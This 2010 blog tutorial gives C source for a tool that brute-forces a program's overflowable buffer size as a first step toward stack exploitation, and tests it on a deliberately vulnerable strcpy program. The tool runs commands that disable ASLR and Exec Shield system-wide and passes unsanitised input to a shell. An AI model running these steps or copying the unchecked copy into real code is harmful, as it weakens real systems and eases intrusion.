Saturday, 20 March 2010
Buffer Size Brute Force Technique
Author: mywisdom
Requirements:
- devilzc0de_bbf.c (devilzc0de buffer size brute force)
note: this does not stand for devilzcode Boys Before Flowers.
- the gcc compiler
- Linux OS
Download: http://yoyoparty.com/upload/devilzc0de_bbf.c
OK, I'm back again; perhaps you are all bored, sick and tired of seeing this guy by now.
This time we will experiment with brute forcing the buffer size of an ELF binary that takes additional arguments and has a buffer overflow bug. If you are good at reverse engineering, this article is not recommended reading. It is aimed at beginners who are lazy or not yet good at reverse engineering.
OK, here is the source code of the tool we will use this time:
filename: devilzc0de_bbf.c
Code:
/*
Devilzc0de Buffer Size Brute Forcer version 1.0
programmer: mywisdom (antonsoft_2004@yahoo.com)
Do visit : http://www.devilzc0de.org !
function searching buffer size of a vulnerable elf binary which requires argument(s)
Special thanks: gunslinger, flyv666,kiddies,cruz3n, c0mrade,chaer newbie,devilz_nongkrong,petimati
Special thanks to all my friends
Greet(s):
-devilzc0de crews and members
-jasakom crews and members
-YCL crews and members
-jatimcrews and members
-darkc0de crews and members
-tecon crews and members
etc...
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define PJG 256
/* text attributes */
#define RESET 0
#define BRIGHT 1
#define DIM 2
#define UNDERLINE 3
#define BLINK 4
#define REVERSE 7
#define HIDDEN 8
/* colours */
#define BLACK 0
#define RED 1
#define GREEN 2
#define YELLOW 3
#define BLUE 4
#define MAGENTA 5
#define CYAN 6
#define WHITE 7
void textcolor(int attr, int fg, int bg);
/* Set text attribute and colours with an ANSI escape sequence. */
void textcolor(int attr, int fg, int bg)
{
    char command[13];
    sprintf(command, "%c[%d;%d;%dm", 0x1B, attr, fg + 30, bg + 40);
    printf("%s", command);
}
/* Stack pointer of this tool itself (x86, low 32 bits), printed for information. */
unsigned long stak_pointer(void)
{
    unsigned int sp;
    __asm__ volatile ("movl %%esp, %0" : "=r" (sp));
    return sp;
}
/* Run the command and capture its stdout. Empty output on any length after
   the first one tested is reported as a possible segmentation fault. */
int pipa(char *perintah, int awal)
{
    FILE *devilzc0de;
    char gunslinger[80];
    int lastchar;
    int panjang;
    static int awal2 = -1; /* first length tested, recorded on the first call only */
    if (awal2 < 0)
        awal2 = awal;
    devilzc0de = popen(perintah, "r");
    if (devilzc0de == NULL)
    {
        perror("popen");
        exit(1);
    }
    /* read at most 79 bytes so the terminating NUL always fits */
    lastchar = fread(gunslinger, 1, sizeof(gunslinger) - 1, devilzc0de);
    gunslinger[lastchar] = '\0';
    textcolor(BRIGHT, GREEN, BLACK);
    printf("Pipe Result:%s", gunslinger);
    panjang = strlen(gunslinger);
    textcolor(BRIGHT, WHITE, BLACK);
    printf("\nPipe length:%d\n", panjang);
    pclose(devilzc0de);
    if (panjang < 1)
    {
        if (awal > awal2)
        {
            textcolor(BRIGHT, YELLOW, BLACK);
            printf("\nPipe stopped !!! possible segmentation fault !\n");
            textcolor(BRIGHT, MAGENTA, BLACK);
            printf("Stack Pointer: 0x%lx\n", stak_pointer());
            textcolor(BRIGHT, BLUE, BLACK);
            printf("\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n");
            printf("\n\tW00t! Found possible max buffer size: %d\n", awal);
            printf("\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n");
            exit(1);
        }
        else
        {
            textcolor(BRIGHT, RED, BLACK);
            printf("\nSorry not vulnerable !!!\n");
            exit(1);
        }
    }
    return 0;
}
int main(int argc, char *argv[])
{
    char nama_elf[256];
    int awal, akhir;
    char perintah2[PJG] = " ";
    FILE *mywisdom;
    if (argc < 4)
    {
        textcolor(BRIGHT, BLUE, BLACK);
        printf("\n********************************************************************************************************\n");
        textcolor(BRIGHT, RED, BLACK);
        printf("\t[Devilzc0de Buffer Size Brute Forcer]\n");
        textcolor(BRIGHT, GREEN, BLACK);
        printf("\tDo Visit www.devilzc0de.org\n");
        textcolor(BRIGHT, YELLOW, BLACK);
        printf("\tProgrammer: mywisdom (antonsoft_2004@yahoo.com)\n");
        textcolor(BRIGHT, CYAN, BLACK);
        printf("\tUsage: %s /path/elf_binary low_number high_number\n", argv[0]);
        textcolor(BRIGHT, GREEN, BLACK);
        printf("\tExample: %s ./vulnerable_elf 1 2000\n", argv[0]);
        textcolor(BRIGHT, RED, BLACK);
        printf("\tThis will search buffer size of a vulnerable elf binary which requires argument(s)\n");
        printf("\tFor more sample usage, visit: http://devilzc0de.org for tutorial(s)");
        textcolor(BRIGHT, BLUE, BLACK);
        printf("\n********************************************************************************************************\n");
        exit(1);
    }
    else
    {
        /* Needs root: these writes switch off ASLR (and Exec Shield, on kernels
           that carry it) for the whole system, not only for the target. */
        system("echo \"0\" > /proc/sys/kernel/randomize_va_space");
        system("echo \"0\" > /proc/sys/kernel/exec-shield");
        system("echo \"0\" > /proc/sys/kernel/exec-shield-randomize");
        /* bounded copy of the target path */
        snprintf(nama_elf, sizeof(nama_elf), "%s", argv[1]);
        textcolor(BRIGHT, BLUE, BLACK);
        printf("\n********************************************************************************************************\n");
        textcolor(BRIGHT, RED, BLACK);
        printf("\n\t[Devilzc0de Buffer Size Brute Forcer]\n");
        textcolor(BRIGHT, BLUE, BLACK);
        printf("\n********************************************************************************************************\n");
        textcolor(BRIGHT, GREEN, BLACK);
        printf("\nExecuting : %s", nama_elf);
        awal = atoi(argv[2]);
        akhir = atoi(argv[3]);
        printf("\nStarting length of string:%d\n", awal);
        printf("\nEnd length of string:%d\n", akhir);
        textcolor(BRIGHT, RED, BLACK);
        printf("Searching please wait ...\n");
        akhir++; /* make the upper bound inclusive */
        system("touch mywisdom");
        while (awal < akhir)
        {
            system("echo null>log");
            mywisdom = fopen("mywisdom", "w");
            if (mywisdom == NULL)
            {
                perror("mywisdom");
                exit(1);
            }
            textcolor(BRIGHT, CYAN, BLACK);
            printf("\nTesting length of input: %d\n", awal);
            /* command line: target followed by a string of awal 'A' characters */
            fprintf(mywisdom, "%s `perl -e 'print \"A\"x%d'`", nama_elf, awal);
            fclose(mywisdom);
            /* read the command line back from the file */
            mywisdom = fopen("mywisdom", "r");
            if (mywisdom == NULL || fgets(perintah2, PJG, mywisdom) == NULL)
            {
                perror("mywisdom");
                exit(1);
            }
            textcolor(BRIGHT, RED, BLACK);
            printf("Executing command:%s\n", perintah2);
            fclose(mywisdom);
            pipa(perintah2, awal);
            awal++;
        }
    }
    return 0;
}
Code:
gcc -o devilzc0de_bbf devilzc0de_bbf.c
filename: vulner.c
Code:
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
    char data[10];
    if (argc > 1)
    {
        /* no length check: this is the overflow the tool looks for */
        strcpy(data, argv[1]);
        printf("Your data:%s\n", data);
    }
    else
    {
        printf("\nArgument must be 2!!!\n");
    }
    return 0;
}
Compile with gcc:
Code:
gcc -o vulner vulner.c
The program copies the whole string passed as its argument into the buffer.
OK, next we run devilzc0de_bbf to see an example of how it is used:
Code:
./devilzc0de_bbf
Code:
********************************************************************************************************
[Devilzc0de Buffer Size Brute Forcer]
Do Visit www.devilzc0de.org
Programmer: mywisdom (antonsoft_2004@yahoo.com)
Usage: ./devilzc0de_bbf /path/elf_binary low_number high_number
Example: ./devilzc0de_bbf ./vulnerable_elf 1 2000
This will search buffer size of a vulnerable elf binary which requires argument(s)
For more sample usage, visit: http://devilzc0de.org for tutorial(s)
********************************************************************************************************
OK, to find the buffer size of the vulner program above, type, for example:
Code:
./devilzc0de_bbf ./vulner 1 100
We will test buffer sizes from 1 to 100.
OK, and as a result the program stops when testing buffer size 10, as shown below:
Code:
Testing length of input: 10
Executing command:./vulner `perl -e 'print "A"x10'`
Pipe Result:
Pipe length:0
Pipe stopped !!! possible segmentation fault !
Stack Pointer: 0xbfffc9f8
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
W00t! Found possible max buffer size: 10
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
bt c #
Yup, we get a buffer size of 10.
So we can obtain the buffer size of an ELF binary without having to do it by hand or through manual reverse engineering (gdb).
From there we can go on to exploit the stack-based buffer overflow, using the buffer size information obtained above.
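For contrast with vulner.c, the following is an added example (not part of the original post or of the devilzc0de tool) showing a length-checked copy and the same 1..100 sweep run against it. store_arg and first_rejected_len are hypothetical names introduced here; a 10-character argument needs 11 bytes with its terminating NUL, so 10 is the first length refused instead of the first length that crashes.

```c
#include <stdio.h>
#include <string.h>

#define DATA_SIZE 10   /* same size as data[] in vulner.c */

/* Hypothetical helper: copy src into dst only if it fits with its NUL.
   Returns 0 on success, -1 if it does not fit (dst is left empty). */
int store_arg(char *dst, size_t dstsz, const char *src)
{
    size_t len = strlen(src);
    if (dstsz == 0)
        return -1;
    if (len >= dstsz) {            /* len + 1 bytes would not fit */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);
    return 0;
}

/* Repeat the low..high sweep of 'A' strings against the checked copy.
   Returns the first length refused, -1 if every length fits, or -2 if the
   guard bytes placed after the buffer were modified (an overflow). */
int first_rejected_len(int low, int high)
{
    struct { char data[DATA_SIZE]; unsigned char guard[8]; } frame;
    char input[256];               /* constructed test input */
    size_t i;
    int n, rc;

    for (n = (low < 0 ? 0 : low); n <= high && n < (int)sizeof(input); n++) {
        memset(frame.guard, 0x5A, sizeof(frame.guard));
        memset(input, 'A', (size_t)n);
        input[n] = '\0';
        rc = store_arg(frame.data, sizeof(frame.data), input);
        for (i = 0; i < sizeof(frame.guard); i++)
            if (frame.guard[i] != 0x5A)
                return -2;
        if (rc != 0)
            return n;
    }
    return -1;
}

int main(void)
{
    printf("first refused length in 1..100: %d\n", first_rejected_len(1, 100));
    return 0;
}
```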
OK, that's all, and thank you for reading this lame write-up. xixixixi